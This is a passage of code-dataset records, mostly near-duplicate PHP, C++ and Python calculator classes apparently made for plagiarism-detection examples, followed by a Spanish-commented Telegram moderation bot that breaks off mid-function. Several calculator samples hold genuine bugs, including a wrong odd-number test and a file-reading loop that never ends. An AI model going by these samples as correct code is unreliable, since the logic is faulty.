$outcome) {\n\t\t\t$this->log($outcome);\n\t\t}\n\t}\n\t\n\t// Compare two numbers\n\tpublic function comparisonNumerals( $numeral1, $numeral2) {\n\t\tif ($numeral1 > $numeral2) {\n\t\t\t$this->log($numeral1 . \" is bigger than \" . $numeral2);\n\t\t} else if ($numeral2 > $numeral1) {\n\t\t\t$this->log($numeral1 . \" is smaller than \" . $numeral2);\n\t\t} else {\n\t\t\t$this->log($numeral1 . \" is the same as \" . $numeral2);\n\t\t}\n\t}\n\t\n\t// Adds $results to records\n\tpublic function pushResultsData($path) {\n if($path !== '')\n try {\n\t\t\t$data = fopen($path, \"r\");\n $row = \"\";\n while (($row = fgets($data)) !== false) {\n $this->pushResult($row);\n }\n fclose($data);\n $this->log(\"records form file was loaded!\");\n\t\t} catch (Exception $error) {\n\t\t\t$this->log(\"File could not be loaded! Because:\" . $error);\n\t\t}\n\t}\n\t\n\t// Returns if numeral is odd\n\tpublic function uneven( $numeral) {\n\t\t$booleanUneven = ($numeral/2) != 0;\n\t\tswitch ($booleanUneven) {\n\t\t\tcase true:\n\t\t\t\t$this->log($numeral . \" is odd!\");\n\t\t\t\treturn true;\n\t\t\tcase false: \n\t\t\t\t$this->log($numeral . \" is not odd!\");\n\t\t\t\treturn false;\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.5635820627212524,
"alphanum_fraction": 0.5725373029708862,
"avg_line_length": 28.65486717224121,
"blob_id": "6587b681382b3416c30842edb7901b9c199622e0",
"content_id": "1ba361e4bfa4c8c7f6e7996c633bb336dfb68ce5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3350,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 113,
"path": "/c++/Calculator.3.cpp",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <string>\n#include <vector>\n#include <chrono>\n#include <ctime>\n#include <fstream>\n\nusing namespace std;\n\n// Calculator class\nclass Calculator {\n // History of results\nprivate: vector<float> history;\n\n // Constructor for loading results from file\n public: Calculator(string fileName) {\n loadHistoryFromFile(fileName);\n print(\"Calculator was created\");\n }\n \n Calculator() {\n print(\"Calculator was created\");\n }\n\n // Returns if number is odd\n public: bool isOdd(float number) {\n bool boolIsOdd = (number/2) != 0;\n switch (boolIsOdd) {\n case true:\n print(to_string(number) + \" is odd!\");\n return true;\n case false:\n print(to_string(number) + \" is not odd!\");\n return false;\n }\n }\n\n // Adds two numbers\n public: float addition(float number1, float number2) {\n float result = number1 + number2;\n print(\"Result od addition is \" + to_string(result));\n addToHistory(result);\n return result;\n }\n\n // Compare two numbers\n public: void compareNumbers(float number1, float number2) {\n if (number1 > number2) {\n print(to_string(number1) + \" is bigger than \" + to_string(number2));\n } else if (number2 > number1) {\n print(to_string(number1) + \" is smaller than \" + to_string(number2));\n } else {\n print(to_string(number1) + \" is the same as \" + to_string(number2));\n }\n }\n\n // Subtracts two numbers\n public: float substraction(float number1, float number2) {\n float result = number1 - number2;\n print(\"Result od substraction is \" + to_string(result));\n addToHistory(result);\n return result;\n }\n\n // Print the whole history\n public: void printHistory() {\n for (float result: history) {\n print(to_string(result));\n }\n }\n\n // Multiplies two numbers\n public: float multiplication(float number1, float number2) {\n float result = number1 * number2;\n print(\"Result od multiplication is \" + to_string(result));\n addToHistory(result);\n return result;\n }\n\n // Adds result to history array\n private: void addToHistory(float item) {\n history.push_back(item);\n }\n\n // Divides two numbers\n public: float division(float number1, float number2) {\n float result = number1 / number2;\n print(\"Result od division is \" + to_string(result));\n addToHistory(result);\n return result;\n }\n\n // Prints text with current date\n public: void print(string text) {\n std::time_t date = std::chrono::system_clock::to_time_t(std::chrono::system_clock::now());\n std::cout << \"# \" << std::ctime(&date) << \" # \" << text;\n }\n\n // Adds results to history\n public: void loadHistoryFromFile(string fileName) {\n try {\n std::ifstream file(fileName);\n string readLine = \"\";\n while (getline(file, readLine)) {\n addToHistory(stof(readLine));\n }\n file.close();\n print(\"History form file was loaded!\");\n } catch (const std::exception& e) {\n print(\"File could not be loaded! Because:\" + std::string(e.what()));\n }\n }\n};"
},
{
"alpha_fraction": 0.5806210041046143,
"alphanum_fraction": 0.591844379901886,
"avg_line_length": 30.809524536132812,
"blob_id": "7be46df9380328eee8a4d714cfae8b05bf531028",
"content_id": "d784009466c9445f3d8ac11dd67cf9825939713d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2673,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 84,
"path": "/python/Calculator.3.py",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "import datetime\n\nclass Calculator:\n # History of results\n history = []\n\n # Constructor for loading results from file\n def __init__(self, fileName):\n self.loadHistoryFromFile(fileName)\n self.print(\"Calculator was created\")\n\n # Returns if number is odd\n def isOdd(self, number):\n boolIsOdd = number / 2 != 0\n if boolIsOdd:\n self.print(str(number) + \" is odd!\")\n return True\n if not boolIsOdd:\n self.print(str(number) + \" is not odd!\")\n return False\n\n # Add two numbers\n def addition(self, number1, number2):\n result = number1 + number2\n self.print('Result of addition is ' + str(result))\n self.addToHistory(result)\n return result\n\n # Print the whole history\n def printHistory(self):\n for result in self.history:\n self.print(str(result))\n\n # Substracts two numbers\n def substraction(self, number1, number2):\n result = number1 - number2\n self.print('Result of substraction is ' + str(result))\n self.addToHistory(result)\n return result\n\n # Compare two numbers\n def compareNumbers(self, number1, number2):\n if number1 > number2:\n self.print(str(number1) + \" is bigger than \" + str(number2))\n elif number2 > number1:\n self.print(str(number1) + \" is smaller than \" + str(number2))\n else:\n self.print(str(number1) + \" is the same as \" + str(number2))\n\n # Multiplies two numbers\n def multiplication(self, number1, number2):\n result = number1 * number2\n self.print('Result of multiplication is ' + str(result))\n self.addToHistory(result)\n return result\n\n # Adds result to history array\n def addToHistory(self, item):\n self.history.append(item)\n \n # Divides two numbers\n def division(self, number1, number2):\n result = number1 / number2\n self.print('Result of division is ' + str(result))\n self.addToHistory(result)\n return result\n\n # Prints text with current date\n def print(self, text):\n date = datetime.datetime.now()\n print(\"# \" + str(date) + \" # \" + text)\n\n # Adds results to history\n def loadHistoryFromFile(self, fileName):\n try:\n file = open(fileName)\n readLine = file.readline()\n while readLine != None:\n self.addToHistory(readLine)\n readLine = file.readline()\n file.close()\n self.print(\"History from file was loaded!\")\n except Exception:\n self.print(\"File could not be loaded! Because:\" + str(Exception))\n\n"
},
{
"alpha_fraction": 0.46807441115379333,
"alphanum_fraction": 0.5128205418586731,
"avg_line_length": 25.53333282470703,
"blob_id": "67d11f4688eabb4debdafbaf826d8f5622f49dc1",
"content_id": "efd2b63c0d3116747f9af1ce6f8dece697877978",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1989,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 75,
"path": "/python/Calculator.4.py",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "import datetime\n\nclass Calculator:\n # History of results\n history = []\n\n # Constructor for loading results from file\n def __init__(self, fileName):\n self.loadHistoryFromFile(fileName)\n self.print(\"Calculator was created\")\n\n # Prints text with current date\n def print(self, text):\n date = datetime.datetime.now()\n print(\"# \" + str(date) + \" # \" + text)\n\n # Add two numbers\n def addition(self, number1, number2):\n result = number1 + number2\n self.print('Result of addition is ' + str(result))\n self.addToHistory(result)\n return result\n\n # Divides two numbers\n def division(self, number1, number2):\n result = number1 / number2\n self.print('Result of division is ' + str(result))\n self.addToHistory(result)\n return result\n\n # Adds result to history array\n def addToHistory(self, item):\n self.history.append(item)\n\n # Adds results to history\n def loadHistoryFromFile(self, fileName):\n try:\n file = open(fileName)\n readLine = file.readline()\n while readLine != None:\n self.addToHistory(readLine)\n readLine = file.readline()\n file.close()\n self.print(\"History from file was loaded!\")\n except Exception:\n self.print(\"File could not be loaded! Because:\" + str(Exception))\n\n def something(self):\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s\n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)\n s = \"12345678\"\n s = \"0\" + s \n print(s)"
}
] | 16 |
cpasoft/Raspython-Bot
|
https://github.com/cpasoft/Raspython-Bot
|
08e0ac7ae5f3d98d38aa6ef1d7f7230c42347216
|
de76e5593bcfcc37889116b426ada756bd4a9b97
|
bf7d32000a911192d4b69ff3fdcd64be86de2f33
|
refs/heads/master
| 2021-01-21T15:03:46.982117 | 2017-07-05T17:45:02 | 2017-07-05T17:45:02 | 95,373,400 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6050986051559448,
"alphanum_fraction": 0.6089329719543457,
"avg_line_length": 44.9507942199707,
"blob_id": "6679410f4977f2446f2b130ca7c247ade1a78653",
"content_id": "298ff620d20c325865f2a956fc4bb5a2b1ee46c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29312,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 630,
"path": "/RaspythonBot.py",
"repo_name": "cpasoft/Raspython-Bot",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# RaspythonBot (c) 2017 - Raspython Group\n#\n# Bot de moderación creado por y para el grupo de Telegram @Raspython\n# t.me/raspython\n#\n#\n\n##########################################################################\n##########################################################################\n\n\n# Librería PTB\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackQueryHandler\nfrom telegram import MessageEntity, ParseMode, InlineKeyboardButton, InlineKeyboardMarkup\nfrom telegram.ext.dispatcher import run_async\n\n# Librería para el log\nimport logging\n\n# Librerías del sistema\nimport os\n\n# Librería regex para filtrar textos\nimport re\n\n# Librería números enteros aleatorios\nfrom random import randint\n\n# Librería de tiempo, para pausas y demás\nfrom time import sleep\nimport datetime\n\n# Librería json\nimport json\n\n# Librería para el wrapping de librerías (decoración)\nfrom functools import wraps\n\n# Importamos las constantes desde el fichero correspondiente\n# Las importamos una a una por claridad y para saber cuales añadimos nuevas\nfrom constantes import TOKEN, LOG_FILE, GROUPS_ID, HASHTAG_FILE, ADMINS, START, END, HASHTAG, ANTIFLOOD, ANTIFLOOD_FILE\nfrom constantes import ANTIFLOOD_MINUTES, ANTIFLOOD_TAG, ANTIFLOOD_TAG_FILE\nfrom constantes import MSG_FLOOD, MSG_AFLOOD_FILE, AFLOOD_MSGS, AFLOOD_TIME, AFLOOD_MINUTES_DEL\n\n# Variables globales:\n# Semáforo para ficheros. Usado para controlar la grabación de ficheros en modo asíncrono\nsemaforo = {\n HASHTAG: False,\n ANTIFLOOD: False,\n ANTIFLOOD_TAG: False,\n MSG_FLOOD: False\n}\n\n# Inicializamos el subsistema de log para nuestro bot. Todos los errores y las informaciones irán a este fichero.\nlogging.basicConfig(filename=LOG_FILE, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\n# Control del semáforo para grabación de ficheros\ndef switch_semaforo(estado, fichero):\n global semaforo\n # Intento de inicio de grabación\n if estado == START:\n # Esperamos a tener el semáforo libre para pillar hueco\n while semaforo[fichero]:\n # Esperamos un tiempo aleatorio de 0 a 10\n sleep(randint(1, 100) / 100)\n # Cuando lo conseguimos, pillamos\n semaforo[fichero] = True\n # Si queremos cerrar el semáforo...\n else:\n semaforo[fichero] = False\n\n\n# Decorador para comprobar si un usuario está autorizado a usar una función (Comandos Admin)\ndef authorized(func):\n @wraps(func)\n def wrapped(bot, update, *args, **kwargs):\n user_id = update.effective_user.id\n chat_id = update.message.chat_id\n # Sólo funcionará si se envía desde privado. En público no funcionan los comandos de Admin\n if chat_id not in GROUPS_ID.values():\n # Si el usuario no es admin, registramos el intento, le respondemos que no puede y anulamos\n if user_id not in ADMINS:\n logger.info(\"Intento de ejecución de un comando privilegiado por el Usuario: {}.\".format(user_id))\n update.message.reply_text(\"Lo siento, no tienes permiso para ejecutar este comando.\")\n return\n # Si sí que es admin, entonces la ejecutamos\n return func(bot, update, *args, **kwargs)\n # Si lo intenta ejecutar en el grupo, no lo permitimos.\n else:\n return\n\n return wrapped\n\n\n# Decorador para comprobar si un comando se ha ejecutado repetidamente para no permitirlo (AntiFlood)\ndef antiflood(func):\n @wraps(func)\n def wrapped(bot, update, *args, **kwargs):\n user_id = update.effective_user.id\n chat_id = update.message.chat_id\n name_func = func.__name__\n # Si se ejecuta desde el grupo comprobaremos el flood\n if chat_id in GROUPS_ID.values():\n funciones_times = read_json(ANTIFLOOD_FILE)\n # Si el fichero existe y no está vacío y el canal existe\n if funciones_times and str(chat_id) in funciones_times:\n # Si la función ya está registrada en el fichero\n if name_func in funciones_times[str(chat_id)]:\n # Si la función ha sido ejecutada en los últimos minutos, no ejecutamos la función\n hora = datetime.datetime.strptime(funciones_times[str(chat_id)][name_func], \"%d-%m-%Y %H:%M\")\n if hora > datetime.datetime.now() - datetime.timedelta(minutes=ANTIFLOOD_MINUTES):\n return\n # Si aún no se ha registrado el canal, lo registramos\n else:\n funciones_times[str(chat_id)] = {}\n # Y registramos la función ejecutada y la hora\n funciones_times[str(chat_id)][name_func] = datetime.datetime.now().strftime(\"%d-%m-%Y %H:%M\")\n graba_json(ANTIFLOOD, ANTIFLOOD_FILE, funciones_times)\n return func(bot, update, *args, **kwargs)\n # Si se envía desde privado, la ejecutamos siempre. Si se quiere hacer flood a si mismo... :-p\n else:\n return func(bot, update, *args, **kwargs)\n\n return wrapped\n\n\n# Función para comprobar si la impresión de un hashtag es muy repetida en tiempo (Antiflood)\ndef antiflood_tags(chat_id, tag):\n # Si la ejecución del trag se hace en los grupos\n if chat_id in GROUPS_ID.values():\n tag_times = read_json(ANTIFLOOD_TAG_FILE)\n # Si el fichero existe y no está vacío y el canal existe\n if tag_times and str(chat_id) in tag_times:\n # Si el tag ya está registrado en el fichero\n if tag in tag_times[str(chat_id)]:\n # Si el tag ha sido ejecutada en los últimos minutos, no ejecutamos la impresión\n hora = datetime.datetime.strptime(tag_times[str(chat_id)][tag], \"%d-%m-%Y %H:%M\")\n if hora > datetime.datetime.now() - datetime.timedelta(minutes=ANTIFLOOD_MINUTES):\n return False\n # Si ese tag o grupo aún no estaba registrado, lo registramos\n else:\n tag_times[str(chat_id)] = {}\n # Grabamos la hora de ejecución del tag correspondiente\n tag_times[str(chat_id)][tag] = datetime.datetime.now().strftime(\"%d-%m-%Y %H:%M\")\n graba_json(ANTIFLOOD_TAG, ANTIFLOOD_TAG_FILE, tag_times)\n return True\n # Si se envía desde privado, la ejecutamos siempre. Si se quiere hacer flood a si mismo... :-p\n else:\n return True\n\n\n# Función de ayuda. Aquí iremos poniendo todos los comandos y opciones de los que vayamos dotando al bot.\n# Intenta enviarla por privado, si no puede, la envía al grupo con enlace al bot + AntiFlood\n@antiflood\ndef bot_help(bot, update):\n # Obtenemos el ID del chat desde donde nos hablan...\n chat_id = update.message.chat_id\n # Y el privado del usuario\n user_id = update.message.from_user.id\n # Intentamos enviarle la ayuda por privado...\n try:\n bot.send_message(chat_id=user_id, text=\"\"\"\nℹ️ COMANDOS Y FUNCIONES DISPONIBLES ℹ️\n\n▪️/canales\nMuestra la relación de canales de Raspito's Family\n▪️ /normas\nMuestra las reglas comunes a los canales de Raspito's Family\n▪️/tags\nMuestra la relación de tags con información disponibles\n\"\"\")\n # Si el usuario es un Admin, le mandamos la extensión de ayuda a administradores\n if user_id in ADMINS:\n bot.send_message(chat_id=user_id, text=\"🔐 ***ADMIN DETECTED***‼\\n\"\n \"Como admin, tienes derecho a añadir, editar y borrar tags.\\n\"\n \"Envía /tags para obtener más ayuda sobre cómo hacerlo.\",\n parse_mode=ParseMode.MARKDOWN)\n # Si no hemos podido enviarlo por privado...\n except:\n update.message.reply_text(\"Para acceder a la ayuda, pincha en <a href='http://t.me/RaspythonBot'>\"\n \"ESTE ENLACE</a> e iníciame...\",\n parse_mode=ParseMode.HTML)\n\n\n# Función de arranque del Bot. Será lo que se muestre cuando un usuario inicie el Bot en privado.\ndef start(bot, update):\n # Obtenemos el ID del chat desde donde nos hablan...\n chat_id = update.message.chat_id\n # La ayuda sólo la mostraremos si se ejecuta en privado. Si se hace en uno de los canales la ignoraremos.\n if chat_id not in GROUPS_ID.values():\n update.message.reply_text(\"🤖 Bienvenido al RaspythonBot 🤖\\n\"\n \"Bot creado y pensado para dar soporte al grupo @Raspython\\n\"\n \"t.me/Raspython\\n\"\n \"Pulsa /help para obtener ayuda sobre lo que puedes hacer\")\n\n\n# Función que muestra la relación de canales de la Raspito's Family\n@antiflood\ndef canales(bot, update):\n # Enviamos la lista de canales de la Raspito's Family con control Antiflood\n update.message.reply_text(\"🔸 Relación de los canales de la Raspito's Family 👨👩👧👦\\n\\n\"\n \"▫️@GrupoRaspberryPI\\n\"\n \"Canal precursor de la Raspito's Family. Dialoga sobre los aspectos generales \"\n \"sobre la Raspberry PI, como donde comprarla, que accesorios son recomendables, \"\n \"dudas sobre configuración, etc. En definitiva, todo lo relacionado sobre nuestras \"\n \"PI que no abarquen más específicamente el resto de canales de la familia.\\n\\n\"\n \"▫️@RaspberryPiMediacenters\\n\"\n \"Canal enfocado al uso y disfrute de nuestras Raspberry Pi como centro multimedia.\\n\\n\"\n \"▫ @RaspberryPiEmuladores\\n\"\n \"Canal dedicado a la temática sobre emulación en nuestras Raspberry Pi. Configura tu \"\n \"pequeña Pi como un centro de juego arcade. Disfruta con la emulación!.\\n\\n\"\n \"▫ @Raspython\\n\"\n \"Grupo para debatir, dialogar y preguntar sobre todo lo relacionado con la programación \"\n \"en Python y Raspberry. Este Bot es precisamente un proyecto desarrollado en este canal. \"\n \"Únete y disfruta.\\n\\n▫ @RaspberryPiOfftopic\\n\"\n \"¿Te apetece hablar con los compañeros de la Raspito's family sobre cualquier otro \"\n \"tema?, pues este es tu canal. Entra charla, comparte y disfruta con el resto de \"\n \"compañeros sin límite de temática. (Contenido sexual explícito, violento y de temáticas \"\n \"similares está prohibido)\")\n\n\n# Función que tiene como objeto mostrar las reglas del grupo\n@antiflood\ndef normas(bot, update):\n # Enviamos las reglas del grupo con control Antiflood\n update.message.reply_text(\"📜 Las reglas de este grupo son muy sencillas...\\n\\n\"\n \"⛔️Nada de sexo explícito, ni política, ni religión, ni nada no relacionado \"\n \"con la temática del canal.\\n\"\n \"🚫 Tampoco están permitidos los enlaces a otros grupos o páginas webs que cumplan \"\n \"los criterios anteriormente descritos.\\n\"\n \"❓ En caso de dudas, consultar con cualquier administrador del grupo.\\n\\n\"\n \"🤙🏼 Como último requisito, pasarlo bien, disfrutar, compartir y que fluya el buen rollo\")\n\n\n# En esta función trataremos los comandos no reconocidos. De momento lo dejamos en \"pass\" para ignorarlos\ndef comando_invalido(bot, update):\n pass\n\n\n# Función en la que filtraremos los datos enviados por el usuario y que trataremos según corresponda\n# De momento sólo responde a un pequeño easteregg en honor a \"Raspito\". Tiene control de flood\n@run_async\ndef trata_texto(bot, update):\n chat_id = update.message.chat_id\n # user_id = update.message.from_user.id\n\n # Si se está hablando desde uno de los canales del grupo, pasamos el antiflood\n if chat_id in GROUPS_ID.values():\n msg_antiflood(bot, update)\n\n texto = update.message.text\n\n if re.search(r\"(?i)qu[eé] es raspito\\b\", texto):\n update.message.reply_text(\"...son los padres\")\n\n\ndef msg_antiflood(bot, update):\n chat_id = update.message.chat_id\n user_id = str(update.message.from_user.id)\n name = update.message.from_user.name\n message_id = update.message.message_id\n time = datetime.datetime.now()\n user_time = None\n\n # El diccionario flood time tendrá la siguiente estructura:\n # ID de usuario : [ Hora de último bloque, Contador mensajes, Warnings, Advertido ]\n flood_tab = read_json(MSG_AFLOOD_FILE)\n\n # Si ha habido error en lectura\n if flood_tab is None:\n logger.info(\"Error en la lectura del fichero de Aflood de mensajes\")\n return\n\n # Si el usuario ya está registrado\n if user_id in flood_tab:\n # Convertimos la hora:\n user_time = datetime.datetime.strptime(flood_tab[user_id][0], \"%d-%m-%Y %H:%M:%S\")\n # Comprobamos la hora de su último bloque de mensajes\n if user_time > time - datetime.timedelta(seconds=AFLOOD_TIME):\n # Si entra dentro del rango de flood, le sumamos uno al contador de mensajes\n flood_tab[user_id][1] += 1\n elif user_time < time + datetime.timedelta(hours=24):\n # Si no, y no han pasado 24 h. le registramos el nuevo bloque de mensajes manteniendo\n # los warning ya existentes\n flood_tab[user_id] = [time.strftime(\"%d-%m-%Y %H:%M:%S\"), 1, flood_tab[user_id][2],\n flood_tab[user_id][3]]\n else:\n # Si han pasado más de 24 horas, le bajamos un grado de nivel de warning\n if flood_tab[user_id][2] >= 2:\n warnings = 1\n else:\n warnings = 0\n flood_tab[user_id] = [time.strftime(\"%d-%m-%Y %H:%M:%S\"), 1, warnings, 0]\n else:\n # Si el usuario no existe, pasamos a registrarlo\n flood_tab[user_id] = [time.strftime(\"%d-%m-%Y %H:%M:%S\"), 1, 0, 0]\n\n # Si ha pasado el tiempo de castigo de borrado de mensajes, le bajamos un nivel. A la próxima fuera!\n if flood_tab[user_id][2] == 2 and user_time + datetime.timedelta(minutes=AFLOOD_MINUTES_DEL) < time:\n flood_tab[user_id][2] = flood_tab[user_id][2] - 1\n\n # Ahora comprobamos cómo está el usuario respecto a contadores y warnings\n # Si el contador es igual o mayor que el número máximo de mensajes, aumentamos warnings\n if flood_tab[user_id][1] >= AFLOOD_MSGS:\n # Si ya ha sido advertido alguna vez del nivel 2:\n if flood_tab[user_id][3]:\n flood_tab[user_id] = [time.strftime(\"%d-%m-%Y %H:%M:%S\"), 0, 3, flood_tab[user_id][3]]\n else:\n flood_tab[user_id] = [time.strftime(\"%d-%m-%Y %H:%M:%S\"), 0,\n flood_tab[user_id][2] + 1, flood_tab[user_id][3]]\n\n # Y ahora hacemos según tenga el warning\n # Si es el primer warning\n if flood_tab[user_id][2] == 1 and flood_tab[user_id][1] == 0:\n update.message.reply_text(\"⚠️***PRIMERA ADVERTENCIA*** ⚠️\\nEl flood no está permitido. \"\n \"No puedes enviar más de {} mensajes en {} segundos\"\n .format(AFLOOD_MSGS, AFLOOD_TIME), parse_mode=ParseMode.MARKDOWN)\n elif flood_tab[user_id][2] == 2 and flood_tab[user_id][1] == 0:\n # Si ya es la segunda vez que está en este nivel en 24h, a la calle\n update.message.reply_text(\"⛔️***SEGUNDA ADVERTENCIA***‼️\\nEl flood no está permitido. \"\n \"Los mensajes que envíe durante los próximos {} minutos serán, eliminados.\\n‼️\"\n \"***No hay más advertencias, a la siguiente, FUERA***‼️\"\n .format(AFLOOD_MSGS, AFLOOD_MINUTES_DEL), parse_mode=ParseMode.MARKDOWN)\n flood_tab[user_id][3] += 1\n elif flood_tab[user_id][2] >= 2:\n # Si ya estamos a nivel warning 2, le borramos el mensaje\n del_right = bot.delete_message(chat_id=chat_id, message_id=message_id)\n if not del_right:\n logger.info(\"Problema al borrar el mensaje {} del usuario {}\".format(message_id, user_id))\n\n # Si alcanza warning 3, o es la segunda vez que alcanza warning 2, a la calle!\n if flood_tab[user_id][2] > 2 or flood_tab[user_id][2] == 2 and flood_tab[user_id][3] > 1:\n bot.send_message(chat_id=chat_id, text=\"EL USUARIO {}{} HA SIDO EXPULSADO POR FLOOD CONTINUO\"\n .format(user_id, name))\n bot.send_message(chat_id=209200079, text=\"EL USUARIO {}{} HA SIDO EXPULSADO POR FLOOD CONTINUO\"\n .format(user_id, name))\n bot.kick_chat_member(chat_id=chat_id, user_id=user_id)\n\n graba_json(MSG_FLOOD, MSG_AFLOOD_FILE, flood_tab)\n\n\n# Función en la que tratamos los hashtags de los mensajes\n@run_async\ndef parsing_hashtag(bot, update):\n chat_id = update.message.chat_id\n # user_id = update.message.from_user.id\n hashtags = update.message.parse_entities('hashtag')\n # Pasamos los hashtags a minúsculas y eliminamos duplicados\n hashtags = set([x.lower() for x in list(hashtags.values())])\n # Leemos la relación de tags de nuestro fichero\n # Ahora mismo sólo soportamos un HASHTAG_FILE, pero lo suyo es tener tantos HASHTAG_FILE como canales diferentes\n # para que cada grupo pueda administrar sus propios tags. Eso obliga a cambiar las funciones de creación de tags.\n bot_tags = read_json(HASHTAG_FILE)\n # Si no a habido problemas y tenemos tags en el fichero, los procesamos\n if bot_tags:\n for h in sorted(hashtags):\n if h in bot_tags:\n if antiflood_tags(chat_id, h):\n update.message.reply_text(\"***#{}***\\n{}\".format(h[1:].capitalize(), bot_tags[h]),\n parse_mode=ParseMode.MARKDOWN, quote=False,\n disable_web_page_preview=True)\n\n\n# Función que abre el JSON de los Hashtag y devuelve su contenido. En caso de error devolvemos nulo.\ndef read_json(file):\n # Si el fichero no existe, devolvemos un diccionario vacío\n if not os.path.isfile(file):\n return {}\n # Intentamos abrirlo y retornamos el contenido\n try:\n with open(file, \"r\") as f:\n return json.load(f)\n # Si no podemos, retornamos nulo\n except:\n return None\n\n\n# Función para añadir tags al fichero\ndef editing_tags(bot, update):\n # Separamos los comandos\n comando = update.message.text_markdown\n chat_id = update.message.chat_id\n # Si sólo ha mandado el comando, mostramos la ayuda\n if not len(comando.split()) == 1:\n # Si el comando es el de \"añadir\"\n if comando.split()[1].lower() == \"add\":\n # Si faltan parámetros\n if len(comando.split()) < 3 or not len(comando.split(\"@@\")) == 2:\n tagtoadd = \"\"\n else:\n # Separamos tag del texto\n tagtoadd = \" \".join(comando.split()[2:]).split(\"@@\")\n\n # Si no lo ha mandado correctamente formateado\n if not len(tagtoadd) == 2 or not len(tagtoadd[0].split()) == 1:\n update.message.reply_text(\"⚠️ Recuerda, `/tags add #etiqueta@@texto`\\n\\n\",\n parse_mode=ParseMode.MARKDOWN)\n return\n\n # Separamos tag del texto\n tag = comando.split(\"@@\")[0].split()[2]\n text = comando.split(\"@@\")[1]\n # Comprobamos que es un tag\n if tag[0] == \"#\":\n # grabamos(tag,texto)\n if graba_tag(tag.lower(), text):\n update.message.reply_text(\"Actualización de hastags correcta 👍🏼\")\n return\n else:\n update.message.reply_text(\"❌ Problema en la grabación de los hashtags\")\n logger.info(\"Problema en la grabación de los hashtags en editing_tags\")\n return\n else:\n update.message.reply_text(\"⚠️No has enviado un hashtag. Te faltó la #\")\n return\n elif comando.split()[1].lower() == \"list\" and len(comando.split()) == 2:\n print_list(bot, update)\n return\n\n elif comando.split()[1].lower() == \"del\" and len(comando.split()) == 3:\n tag = comando.split()[2]\n if tag[0] == \"#\":\n keyboard = [[InlineKeyboardButton(\"Si\", callback_data='Si_delete'),\n InlineKeyboardButton(\"No\", callback_data='No_delete')]]\n reply_markup = InlineKeyboardMarkup(keyboard)\n bot.send_message(chat_id=chat_id, text='¿Quieres eliminar el tag {}?:'\n .format(tag), reply_markup=reply_markup)\n else:\n update.message.reply_text(\"⚠️No has enviado un hashtag. Te faltó la #\")\n return\n\n # Si hemos llegado aquí, es que el comando estaba mal formado.\n update.message.reply_text(\"📌 El uso de /tags es el siguiente:\\n\\n\"\n \"▫️Para añadir o editar un hashtag existente usa:\\n`/tags add #etiqueta@@texto`\\n\"\n \"▫ Para eliminar un hashtag usa:\\n`/tags del #etiqueta`\\n\"\n \"▫ Para listar los hashtag establecidos usa:\\n`/tags list`\\n\",\n parse_mode=ParseMode.MARKDOWN)\n return\n\n\n# Función que realiza la grabación del JSON con control asíncrono\n# Recibe en tipo la variable del semáforo, el fichero y los datos a guardar\ndef graba_json(tipo, file, datos):\n # Solicitamos permiso al semáforo\n switch_semaforo(START, tipo)\n try:\n with open(file, \"w\") as f:\n json.dump(datos, f)\n # Liberamos el semáforo\n switch_semaforo(END, tipo)\n return True\n except:\n logger.info(\"Error de grabación al grabar {}.\".format(file))\n # Liberamos el semáforo\n switch_semaforo(END, tipo)\n return False\n\n\n# Función que realiza la grabación del JSON de los tags con control asíncrono\n# Recibo el tag a guardar y el texto del mismo\ndef graba_tag(tag, texto):\n # Solicitamos permiso al semáforo\n switch_semaforo(START, HASHTAG)\n # Leemos las tags del fichero\n bot_tags = read_json(HASHTAG_FILE)\n # Comprobamos si la lectura ha tenido éxito\n if bot_tags is None:\n logger.info(\"Error de lectura del hashtagfile en graba_tag.\")\n # Liberamos el semáforo\n switch_semaforo(END, HASHTAG)\n return False\n # Actualizamos o creamos el tag con el texto\n bot_tags[tag] = texto\n try:\n with open(HASHTAG_FILE, \"w\") as f:\n json.dump(bot_tags, f)\n # Liberamos el semáforo\n switch_semaforo(END, HASHTAG)\n return True\n except:\n logger.info(\"Error de lectura del hashtagfile en graba_tag.\")\n # Liberamos el semáforo\n switch_semaforo(END, HASHTAG)\n return False\n\n\n# Función que recorre el fichero de tags y los manda formateados en columnas\n@antiflood\n@run_async\ndef list_tags(bot, update):\n # Si lo manda uno de los admins por privado\n if update.message.chat_id in ADMINS:\n # Le mando a la función avanzada\n editing_tags(bot, update)\n else:\n print_list(bot, update)\n\n\ndef print_list(bot, update):\n # Leemos la relación de tags de nuestro fichero\n bot_tags = read_json(HASHTAG_FILE)\n # Si no a habido problemas y tenemos tags en el fichero, los procesamos\n if bot_tags:\n update.message.reply_text(\"👇🏼 A continuación la relación de tags registrados 👇🏼\", quote=False)\n i = 0\n tag_text = \"\"\n for h in sorted(bot_tags):\n i += 1\n tag_text += \"#️⃣\" + \" \" + \"`\" + h[1:].upper() + \"`\" + \"\\n\"\n if i > 20:\n update.message.reply_text(tag_text, parse_mode=ParseMode.MARKDOWN, quote=False)\n i = 0\n tag_text = \"\"\n if i:\n 